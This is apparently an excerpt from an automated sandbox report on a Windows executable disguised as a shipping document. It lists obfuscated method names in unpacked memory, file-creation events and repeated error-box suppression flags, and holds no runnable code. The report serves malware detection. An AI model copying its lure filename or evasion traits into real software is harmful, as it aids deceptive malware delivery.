Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xrEFMlggE8ooeyiF8K.cs	High entropy of concatenated method names: 'nZwuBtL8Wv', 'qclukbdmwJ', 'HCNulF9Qto', 'OBCuyat1Au', 'U1ouX7Mcx7', 'GpOuFFc8C3', 'S9GobSKvKVvhP0hb70', 'NlGAl5xbSGILUAlq8S', 'HjQuufuIdO', 'aoguMvUDKF'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, csB7fXuvTlkCxU6v1N8.cs	High entropy of concatenated method names: 'RaiI4UqgfW', 'pJCICD1Qv0', 'dHMI2t6Iy8', 'XmbI0ef4ts', 'tK4ImfccFk', 'TYGIO6BAIK', 'C4xIDKuAo4', 'RcHIah5hoK', 'gYwI9ii3NM', 'Vk4I8HOLhF'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, PVd1GCtR0bJQQa1mhs.cs	High entropy of concatenated method names: 'EtRHwyOd5Q', 's8EHjPIUF7', 'oI8How0qqF', 'ToString', 'FPDHft4A4Y', 'mhpHrwBnVc', 'Eoa57nROfRNEVC56QQT', 'kauFl4R481U1hqlCBix', 'lOpApYRgwcGxQDjmuJI', 'wSI8TvRyqe69AM1P2rA'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xlI4iAklxGArgVrnMs.cs	High entropy of concatenated method names: 'qIQMTpWrWt', 'hcqML81XaH', 'OHeMxPBRjO', 'HC8MEUhXJb', 'U0rM3gUcHF', 'HjoMHPGaKa', 'MZHMBotVbE', 'VREMkaXNu0', 'SnIMKHuy6H', 'TyFMl2oYfd'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, SuAEeQc8I3vT7aTCms.cs	High entropy of concatenated method names: 'b1pB4oNlyq', 'voFBCdqliQ', 'KiaB22MBg0', 'm2HB0tGwy5', 'vi6Bmh3kJh', 'RQyBODOPOB', 'jt5BDWbvIP', 'dxWBaTdQIL', 'XbgB9tT2gq', 'SFBB8hgjtk'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, TTQH6QxdPXeNjJNoSn.cs	High entropy of concatenated method names: 'Dispose', 'sSXub5IFax', 'SWDhslUISZ', 'GiE33XVdcK', 'D8iuJJ0DND', 'PJluzX1dFB', 'ProcessDialogKey', 'gfohvaBhcw', 'VZvhuAC3Ji', 'pEBhhZrvj5'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, J1AubU8Cj2WQPf1o7M.cs	High entropy of concatenated method names: 'Vl93ms0S6n', 'aPT3Dqe5ht', 'tKhEWIKyPi', 'xiaESjU2Cy', 'K42E6B1X7h', 'E7OEtEuVb8', 'BFJEpMLfiv', 'agTEdd3c7i', 'icjEcRNyMQ', 'HFdEYOs9kH'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, RneVnmja3TaUfmP2sr.cs	High entropy of concatenated method names: 'nq8Nl2R5nn', 'oAQNydbvKq', 'ToString', 'rRWNL8YTjg', 'Ts3NxX2UlA', 'eOxNECyR4r', 'o2PN39lPaH', 'MrDNHmlh8D', 'mgUNBj7sJa', 'oITNkwRlt7'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, Oj8WJmh7ZwG5taFvHE.cs	High entropy of concatenated method names: 'heN2tuJDL', 'lB307JD4b', 'dR2OwKSmJ', 'niJD0ObYo', 'SBl9Xtakm', 'fgn8Sgkls', 'xZkMDugGbokLcgaXYL', 'Rar5aJyDhu0kF3tTvZ', 'vn0ejLauS', 'HFiGjZL8K'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, FiJ0DNQD5JlX1dFBEf.cs	High entropy of concatenated method names: 'zRBeL2qN6m', 'YudexvSjQb', 'aebeEw6QOv', 'GO0e39lt9V', 'cSMeHVpE7G', 'U9yeB4GAHo', 'I7mekKtU9n', 'qhneK16VX7', 'f5oelOIFjO', 'vsdeyBDhEI'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, B9Op3HRAQghurniPAZ.cs	High entropy of concatenated method names: 'eQlVahW75o', 'jBLV9sLY1M', 'EtTVZ7DGdk', 'LljVs5sR2A', 'w2wVSXMFjl', 'wC4V6vXx2k', 'LeDVp7Agaa', 'JX7VdnvwRs', 'YLmVYY6SSB', 'BBMVUGnLkq'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xQkALIzXG59GrjeogD.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fjYIV4hatZ', 'NKuIXo1GnY', 'fgRIFKabMM', 'NhIINNpDfe', 'MBVIeU9j0d', 'v5dIIcle81', 'SnxIGMUAj4'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, kLxMMAw7KmIH5Fx1oS.cs	High entropy of concatenated method names: 'ToString', 'zUDFUhlJ3r', 'MXiFs0hUZv', 'qOsFWANpMB', 'MveFShg9ui', 'qFGF6yBMIj', 'uB5FtIJErW', 'ic4FpgcjjE', 'tykFdJCfvb', 'zldFcdiSrl'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, Nx7spOZFc8C3EVoR0m.cs	High entropy of concatenated method names: 'jX4HT0aqKm', 'Xk8HxnZcLw', 'm5eH3qZTwh', 'ChqHBHhm2U', 'yLLHkHYOHO', 'OZO3o4lYC6', 'xSG3fYGZiY', 'oso3rNA0Gg', 'M1q3Quo2RI', 'Ayc3b3WUla'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, sCSDUluMB1aWn7VZ9rF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jIHGPMdJM2', 'NJ2GAQNYOB', 'sOnGwwRqLZ', 'FVuGjV5bTH', 'Xu7Go4J3Ka', 'TD3Gf1HS0N', 'f0sGrY6IgX'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, NCRonW9CNF9QtoUBCa.cs	High entropy of concatenated method names: 'omOE0tgJRG', 'aArEObQPiN', 'xoaEawhlN1', 'GQpE9irjsf', 'HZdEXxwpRt', 'TJwEFcmvyp', 'QMZEN8BZjF', 'xQhEeVeXwd', 'VcPEI6BCRV', 'IPfEGe7Esq'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xDtpkpElYJ2Ai095nL.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'a8Nhbe92tc', 'OdDhJOuiL7', 'acNhzBN90N', 'd7yMv7Jjwm', 'MLvMue93ny', 'rQwMhBwShV', 'mT4MMeqoSj', 'UpmXjiFRd5oTueylsqI'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, j7jAn3fLnEhc2oUuwj.cs	High entropy of concatenated method names: 'GtYNQ04RBF', 'X3DNJjZ4fn', 'zeeev67Q3r', 'u9XeuhMZSX', 'aG4NU2bffW', 'q7HN5q31HM', 'fkyNRnYfga', 'vLFNPqibUp', 'zPlNA2yjBT', 'lG2NwVYtEb'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, UaBhcwbrZvAC3JiFEB.cs	High entropy of concatenated method names: 'SCueZpb5WD', 'vPheshmXVg', 'DrkeWUYcn5', 'kaaeSMkScS', 'BW9eP3Yj0o', 'mEde6LbGAl', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, PaRybap7lJOiB4GDgn.cs	High entropy of concatenated method names: 'krdBLtBdwP', 'farBE0YfeV', 'rZWBHgaYwm', 'Oy3HJeKwPv', 'jDkHzIMET6', 'm2JBvJDEpR', 'Q0QBukFaPF', 'PB2BhlcyN3', 'qbJBMrgS22', 'nENBgqN8sO'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, Grvj5UJhfZRvk38vCF.cs	High entropy of concatenated method names: 'B9mIuyhu7y', 'qxMIMtDTUo', 'fHeIgruJk0', 'iChILbtYCn', 'kD0Ixf7ElJ', 'SrTI3bXnfX', 'amsIHsWqSp', 'hsperAmsMw', 'CiTeQtrm57', 'bdfebXM7RU'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, StL8WvaNclbdmwJqfH.cs	High entropy of concatenated method names: 'JWixP7ReaT', 'B4fxAdXHXq', 'o0dxwKY2Gt', 'q6KxjV1P4y', 'pffxoNywcP', 'erNxfEmGHg', 'nXqxreKDg3', 'VkZxQPQBep', 'TnUxbFH92S', 'ratxJ5cxrO'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, rpOlCkPe18lFvoF12b.cs	High entropy of concatenated method names: 'lUnXYUo3YS', 'mUWX5C0fmS', 'mnOXPXxD2x', 'SpUXAgp70V', 'bGxXs2RRUP', 'gu3XW3opM9', 'AQpXSJGQWR', 'wN2X6thMn8', 'ztiXtN2ZLQ', 'YygXpLJQDp'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xrEFMlggE8ooeyiF8K.cs	High entropy of concatenated method names: 'nZwuBtL8Wv', 'qclukbdmwJ', 'HCNulF9Qto', 'OBCuyat1Au', 'U1ouX7Mcx7', 'GpOuFFc8C3', 'S9GobSKvKVvhP0hb70', 'NlGAl5xbSGILUAlq8S', 'HjQuufuIdO', 'aoguMvUDKF'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, csB7fXuvTlkCxU6v1N8.cs	High entropy of concatenated method names: 'RaiI4UqgfW', 'pJCICD1Qv0', 'dHMI2t6Iy8', 'XmbI0ef4ts', 'tK4ImfccFk', 'TYGIO6BAIK', 'C4xIDKuAo4', 'RcHIah5hoK', 'gYwI9ii3NM', 'Vk4I8HOLhF'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, PVd1GCtR0bJQQa1mhs.cs	High entropy of concatenated method names: 'EtRHwyOd5Q', 's8EHjPIUF7', 'oI8How0qqF', 'ToString', 'FPDHft4A4Y', 'mhpHrwBnVc', 'Eoa57nROfRNEVC56QQT', 'kauFl4R481U1hqlCBix', 'lOpApYRgwcGxQDjmuJI', 'wSI8TvRyqe69AM1P2rA'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	File created: \awb# 1294440291; 2 ki_n; g.w 3.30 kg.exe
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	File created: \awb# 1294440291; 2 ki_n; g.w 3.30 kg.exe
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	File created: \awb# 1294440291; 2 ki_n; g.w 3.30 kg.exe
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	File created: \awb# 1294440291; 2 ki_n; g.w 3.30 kg.exe	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	File created: \awb# 1294440291; 2 ki_n; g.w 3.30 kg.exe	Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
